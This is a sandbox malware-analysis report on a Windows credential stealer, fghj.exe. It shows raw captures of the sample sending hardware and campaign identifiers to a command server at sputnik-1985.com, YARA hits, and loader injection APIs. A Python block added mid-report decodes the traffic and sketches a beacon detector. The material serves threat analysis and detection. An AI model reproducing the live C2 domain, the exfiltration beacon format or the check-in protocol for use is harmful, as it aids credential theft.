Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lA7Rv%2B17%2FGjmCql%2BAxXJWQ7PCBVICZEmUwnAjzS9kYrgmYp7P1cgDxUhGa1Y%2Fim7Ov0GudPPuLui9GtoDsMIc4VUzRuYPZZru1xo6JTOokmlISBl22J1C0ynKsKCxnssIyv%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc176afaea1a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1978&rtt_var=754&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13771&delivery_rate=1439842&cwnd=157&unsent_bytes=0&cid=77e86f1cf0f7a684&ts=576&x=0"
2025-01-10 10:47:53 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-10 10:47:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49850 | 104.21.96.144 | 443 | 7372 | C:\Users\user\Desktop\fghj.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:47:53 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QJOBUM86SESDBVW93
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15064
Host: sputnik-1985.com
2025-01-10 10:47:53 UTC | 15064 | OUT | Data Raw: 2d 2d 51 4a 4f 42 55 4d 38 36 53 45 53 44 42 56 57 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 51 4a 4f 42 55 4d 38 36 53 45 53 44 42 56 57 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 4a 4f 42 55 4d 38 36 53 45 53 44 42 56 57 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
Data Ascii: --QJOBUM86SESDBVW93Content-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--QJOBUM86SESDBVW93Content-Disposition: form-data; name="pid"2--QJOBUM86SESDBVW93Content-Disposition: form-data; name="lid"HpOoIh--2a727a03
2025-01-10 10:47:54 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:47:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bbhtisrejk3jas8kppcmstnkgu; expires=Tue, 06 May 2025 04:34:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpN%2Fwgc8BnL32mauLH4y31v7mToOafO8sL1yhwgw1o%2B7kVLbm%2B89JixiZoHdfrxFeK3ZEjhIZJu3nelHVpBfdC8C1rjIA490XN2I8ZuydOa7cIkbQU4pfM3gSJoTeE8%2BPRQl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc1772c97c72a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=1976&rtt_var=771&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16003&delivery_rate=1477732&cwnd=212&unsent_bytes=0&cid=cc985e465a8ae0f3&ts=518&x=0"
2025-01-10 10:47:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-10 10:47:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.9 | Source Port: 49861 | Destination IP: 104.21.96.144 | Destination Port: 443 | PID: 7372 | Process: C:\Users\user\Desktop\fghj.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:47:55 UTC | 283 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=5BM7KYTRHVLKF0TSQY4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20592
    Host: sputnik-1985.com
2025-01-10 10:47:55 UTC | 15331 | OUT | Data Raw: 2d 2d 35 42 4d 37 4b 59 54 52 48 56 4c 4b 46 30 54 53 51 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 35 42 4d 37 4b 59 54 52 48 56 4c 4b 46 30 54 53 51 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 42 4d 37 4b 59 54 52 48 56 4c 4b 46 30 54 53 51 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61
    Data Ascii: --5BM7KYTRHVLKF0TSQY4Content-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--5BM7KYTRHVLKF0TSQY4Content-Disposition: form-data; name="pid"3--5BM7KYTRHVLKF0TSQY4Content-Disposition: form-data; name="lid"HpOoIh--2a
2025-01-10 10:47:55 UTC | 5261 | OUT | Data Raw: 08 13 c6 1b 09 3d 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00
    Data Ascii: =QB-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([:s~
2025-01-10 10:47:55 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:47:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=bevqekfcb637he51pu3p8q9l99; expires=Tue, 06 May 2025 04:34:34 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwkEYB8JJU8Hw59O9NtgknAjK1WlKMc%2Ft22KDuyDa3WhwKn9JLOWa5MiXIPrwQ6EDAyBx16oR%2FFVu%2F9dBlGSfx4rAlat4qeZoV8tQjmJ97390Dwq9j1NIYMjhgUIQfudyom1"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc177b5bb01a48-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1982&rtt_var=763&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21555&delivery_rate=1416787&cwnd=157&unsent_bytes=0&cid=49a47b119bdd383e&ts=641&x=0"
2025-01-10 10:47:55 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-10 10:47:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.9 | Source Port: 49872 | Destination IP: 104.21.96.144 | Destination Port: 443 | PID: 7372 | Process: C:\Users\user\Desktop\fghj.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:47:56 UTC | 280 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=GDDJO2CL1PTZAMGOW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1231
    Host: sputnik-1985.com
2025-01-10 10:47:56 UTC | 1231 | OUT | Data Raw: 2d 2d 47 44 44 4a 4f 32 43 4c 31 50 54 5a 41 4d 47 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 47 44 44 4a 4f 32 43 4c 31 50 54 5a 41 4d 47 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 44 44 4a 4f 32 43 4c 31 50 54 5a 41 4d 47 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
    Data Ascii: --GDDJO2CL1PTZAMGOWContent-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--GDDJO2CL1PTZAMGOWContent-Disposition: form-data; name="pid"1--GDDJO2CL1PTZAMGOWContent-Disposition: form-data; name="lid"HpOoIh--2a727a03
2025-01-10 10:47:57 UTC | 1124 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:47:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0u3d82vk553kpuicvo8vg23glk; expires=Tue, 06 May 2025 04:34:36 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gA3wdSNdtxDui40TAke5K2NQoBSqwcqSIayROalOPniYmicPMZ1t5Z0HMwr35nn6NwLeXSmeYJ%2FX7DIul3M07mGmXS%2FwxYY4sJC%2BzI4VMps9aVQkRWIgV42OmU1jki9V%2BgX0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc17840ef74363-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1507&rtt_var=596&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2147&delivery_rate=1791411&cwnd=240&unsent_bytes=0&cid=cb4b43da3f985fd9&ts=740&x=0"
2025-01-10 10:47:57 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-10 10:47:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.9 | Source Port: 49878 | Destination IP: 104.21.96.144 | Destination Port: 443 | PID: 7372 | Process: C:\Users\user\Desktop\fghj.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:47:58 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=H5JU37N1HB6AHCS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1109
    Host: sputnik-1985.com
2025-01-10 10:47:58 UTC | 1109 | OUT | Data Raw: 2d 2d 48 35 4a 55 33 37 4e 31 48 42 36 41 48 43 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 48 35 4a 55 33 37 4e 31 48 42 36 41 48 43 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 35 4a 55 33 37 4e 31 48 42 36 41 48 43 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a
    Data Ascii: --H5JU37N1HB6AHCSContent-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--H5JU37N1HB6AHCSContent-Disposition: form-data; name="pid"1--H5JU37N1HB6AHCSContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d
2025-01-10 10:47:58 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:47:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=knl3s24t0pa8rq7a35hsfgfeft; expires=Tue, 06 May 2025 04:34:37 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuJ2%2FOqToDlsWyFfh5OoGqA6kfX0uAm%2Bwjgo5oXVsFWN3ItIEhMssqRI3tVV%2B8GQTzr5P%2Boe7VrHIvnZWzRLLdl24J%2FTjOeSCsYYvaVDy5UfgtKvxCYbqX3xdd6G8p%2BxX0MN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc178c3d834363-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1560&rtt_var=629&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2023&delivery_rate=1680092&cwnd=240&unsent_bytes=0&cid=7c9be59970caaaf1&ts=491&x=0"
2025-01-10 10:47:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-10 10:47:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49889 | 104.21.96.1 | 443 | 7372 | C:\Users\user\Desktop\fghj.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:47:59 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 121
Host: sputnik-1985.com
2025-01-10 10:47:59 UTC | 121 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38
Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=BD1F8E61639CC9B7EB3EC5FED8AD62A8
2025-01-10 10:47:59 UTC | 1118 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:47:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=avpsb8d6jc8caujqmigdkvhh6l; expires=Tue, 06 May 2025 04:34:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiopw7y3N1XoJnyFf86CCrJIo6ZtFMm73qontuwZxYDdqY3fCNEH9Ivf9EQuFWFaZkXUvaexOq5Er3rWF4s2H2GkDBGQYmN%2FQyoKK1TC95pfsIIxZRqCXGPMAcgSCr0oU1k7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc1792a8b0c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1568&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1022&delivery_rate=1772920&cwnd=178&unsent_bytes=0&cid=bb49075a18683d89&ts=492&x=0"
2025-01-10 10:47:59 UTC | 54 | IN | Data Raw: 33 30 0d 0a 6c 70 72 71 65 56 5a 2f 46 52 65 51 6c 39 74 52 38 34 64 5a 36 61 62 68 6e 61 69 79 2b 4f 4d 39 46 6e 61 66 47 6b 57 50 56 4c 62 4e 78 77 3d 3d 0d 0a
Data Ascii: 30lprqeVZ/FReQl9tR84dZ6abhnaiy+OM9FnafGkWPVLbNxw== (chunked encoding: size line "30" = 48 bytes, then the base64 payload "lprqeVZ/FReQl9tR84dZ6abhnaiy+OM9FnafGkWPVLbNxw==")
2025-01-10 10:47:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk)
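As an added example, not part of the Joe Sandbox report and not code from the sample, the following Python reassembles the two chunked responses from the raw bytes above and checks a request against the field layout of the check-in POST (act, ver, lid, j, hwid sent as a form body to /api). The byte strings and the POST body are copied from the report; `is_lumma_checkin` is a hypothetical detection helper whose criteria (those five fields, two 32-character hex values, POST to /api) are assumptions drawn only from this single capture, and `opaque_payload` only confirms that the base64 reply decodes, since its contents are not plaintext.

```python
"""Decode the chunked HTTP bodies and parse the form-encoded check-in captured above.

Added example (not part of the Joe Sandbox report). The byte strings are copied from
the report's "Data Raw" / "Data Ascii" lines; nothing here assumes field meanings
beyond what the capture shows.
"""
import base64
import re
from urllib.parse import parse_qs

# Response bodies as sent by the C2, copied from the report's "Data Raw" lines.
RESP_A_HEX = "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"
RESP_B_HEX = (
    "33 30 0d 0a 6c 70 72 71 65 56 5a 2f 46 52 65 51 6c 39 74 52 38 34 64 5a 36 61 62 68 "
    "6e 61 69 79 2b 4f 4d 39 46 6e 61 66 47 6b 57 50 56 4c 62 4e 78 77 3d 3d 0d 0a "
    "30 0d 0a 0d 0a"
)
# The 121-byte POST body from session 8, copied from the report's "Data Ascii" line.
POST_BODY = (
    "act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d"
    "&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=BD1F8E61639CC9B7EB3EC5FED8AD62A8"
)

# Assumption: the five field names and the two 32-hex-char values are taken from this one capture.
BEACON_FIELDS = ("act", "ver", "lid", "j", "hwid")
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; raises ValueError on bad framing."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size = int(raw[pos:eol].split(b";")[0].strip(), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last chunk; trailers, if any, are ignored
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk or missing CRLF after chunk data")
        out += chunk
        pos += size + 2


def parse_beacon(body: str) -> dict:
    """Split the form-encoded check-in into single-valued fields (ValueError if malformed)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True, strict_parsing=True).items()}


def is_lumma_checkin(method: str, path: str, headers: dict, body: str) -> bool:
    """Hypothetical detection helper: match the request shape seen in the capture.
    Deliberately does not key on the Host header; the domain is a per-campaign value,
    the field layout is the part worth matching."""
    if method != "POST" or path != "/api":
        return False
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    if ctype.split(";")[0].strip().lower() != "application/x-www-form-urlencoded":
        return False
    try:
        fields = parse_beacon(body)
    except ValueError:
        return False
    if not all(name in fields for name in BEACON_FIELDS):
        return False
    return bool(HEX32.match(fields["hwid"])) and bool(HEX32.match(fields["j"]))


def opaque_payload(chunked_hex: str) -> bytes:
    """Decode the base64 chunk body of the second response; the result is not plaintext."""
    return base64.b64decode(decode_chunked(bytes.fromhex(chunked_hex)), validate=True)


if __name__ == "__main__":
    print(decode_chunked(bytes.fromhex(RESP_A_HEX)))
    print(parse_beacon(POST_BODY))
    print(is_lumma_checkin("POST", "/api", {"Content-Type": "application/x-www-form-urlencoded"}, POST_BODY))
    print(len(opaque_payload(RESP_B_HEX)), "opaque bytes in the get_message reply")
```

The first reply decodes to "ok" followed by an IPv4 address; the second decodes to 34 bytes that are not printable and are left as-is. A matcher built from one capture is a starting point, not a signature: confirm the field set against more samples before deploying it, and keep the domain out of the rule.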


Target ID:0
Start time:05:47:33
Start date:10/01/2025
Path:C:\Users\user\Desktop\fghj.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\fghj.exe"
Imagebase:0x3a0000
File size:3'206'904 bytes
MD5 hash:549E550F48B48DE65C69C4E87BFFAA00
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1579195348.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Execution Graph

Execution Coverage:1.4%
Dynamic/Decrypted Code Coverage:92.3%
Signature Coverage:40%
Total number of Nodes:130
Total number of Limit Nodes:14
execution_graph (node/edge listing condensed; the API chains it records are): in the main image (Imagebase 0x3a0000) the path from 0x3a899e calls VirtualAlloc and then three GetProcessHeap/HeapAlloc pairs; in the 0xb00000 region (the dump matched by Windows_Trojan_Donutloader_f40e3759) the code reads the PEB, enumerates threads with CreateToolhelp32Snapshot / Thread32First / Thread32Next / CloseHandle, and starts threads with CreateThread; from 0xb4af8d onward it resolves modules through repeated LoadLibraryA calls, allocates with VirtualAlloc and adjusts page permissions with VirtualProtect, and the function at 0xb4fe8d performs NtCreateSection, NtMapViewOfSection, VirtualAlloc, a second NtMapViewOfSection, three VirtualProtect calls and CreateThread, with VirtualFree followed by RtlExitUserProcess on the exit path.
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00B4FF26
                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 00B4FFCE
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B50342
                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00B503F7
